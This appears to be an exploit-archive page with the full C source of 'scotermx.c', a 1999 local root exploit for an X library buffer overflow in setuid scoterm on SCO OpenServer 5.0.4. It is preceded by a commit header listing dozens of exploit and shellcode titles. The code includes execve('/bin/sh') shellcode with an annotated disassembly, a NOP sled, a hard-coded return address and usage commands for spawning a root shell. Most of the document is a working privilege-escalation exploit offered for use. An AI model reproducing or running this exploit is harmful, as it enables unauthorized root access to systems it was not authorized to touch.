880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
92 lines
No EOL
2.5 KiB
C
92 lines
No EOL
2.5 KiB
C
// source: https://www.securityfocus.com/bid/638/info
|
|
|
|
A buffer overflow vulnerability in the shared X library may allows local users to obtain higher privileges. Any setuid applications linked against the library are possibly vulnerable. The vulnerability is in the handling of the '-bg' command line parameter.
|
|
|
|
|
|
Setuid root applications known to be vulnerable inclue xload, xmcd, xterm, and scoterm.
|
|
|
|
Setuid bin applications known to be vulnerable include scosession.
|
|
|
|
/*
|
|
* <scotermx.c> Local root exploit
|
|
*
|
|
* Offset: scoterm (SCO OpenServer 5.0.4)
|
|
* 0 -> From an open scoterm (without display parameter)
|
|
* 2500 -> From remote telnet (with display parameter)
|
|
*
|
|
* Usage:
|
|
* $ cc scotermx.c -o scotermx
|
|
* $ scoterm
|
|
* $ /usr/bin/X11/scoterm -geometry `scotermx 0`
|
|
* or
|
|
* $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500`
|
|
*
|
|
* Note: scoterm need to be run from a valid x-display
|
|
*
|
|
* By: The Dark Raver of CPNE (Murcia/Spain - 21/6/99)
|
|
*
|
|
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
|
|
*
|
|
*/
|
|
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
|
|
|
|
char hell[]=
|
|
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
|
|
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
|
|
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
|
|
|
|
/*
|
|
char hell[]=
|
|
"\xeb\x1b" // start: jmp uno
|
|
"\x5e" // dos: popl %esi
|
|
"\x31\xdb" // xorl %ebx,%ebx
|
|
"\x89\x5e\x07" // movb %bl,0x7(%esi)
|
|
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
|
|
"\x88\x5e\x11" // movb %bl,0x11(%esi)
|
|
"\x31\xc0" // xorl %eax,%eax
|
|
"\xb0\x3b" // movb $0x3b,%al
|
|
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
|
|
"\x89\xf9" // movl %edi,%ecx
|
|
"\x53" // pushl %ebx
|
|
"\x51" // pushl %ecx
|
|
"\x56" // pushl %esi
|
|
"\x56" // pushl %esi
|
|
"\xeb\x10" // jmp execve
|
|
"\xe8\xe0\xff\xff\xff" // uno: call dos
|
|
"/bin/sh"
|
|
"\xaa\xaa\xaa\xaa"
|
|
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
|
|
*/
|
|
|
|
|
|
#define OFF 0x80452ff // SCO OpenServer 5.0.4
|
|
#define ALINEA 1
|
|
#define LEN 2000
|
|
|
|
|
|
int main(int argc, char *argv[]) {
|
|
|
|
int offset=0;
|
|
char buf[LEN];
|
|
int i;
|
|
|
|
if(argc < 2) {
|
|
printf("Usage: scotermx <offset>\n");
|
|
exit(0); }
|
|
else {
|
|
offset=atoi(argv[1]); }
|
|
|
|
memset(buf,0x90,LEN);
|
|
memcpy(buf+1000,hell,strlen(hell));
|
|
for(i=1100+ALINEA;i<LEN-4;i+=4)
|
|
*(int *)&buf[i]=OFF+offset;
|
|
|
|
for(i=0;i<LEN;i++)
|
|
putchar(buf[i]);
|
|
|
|
exit(0);
|
|
} |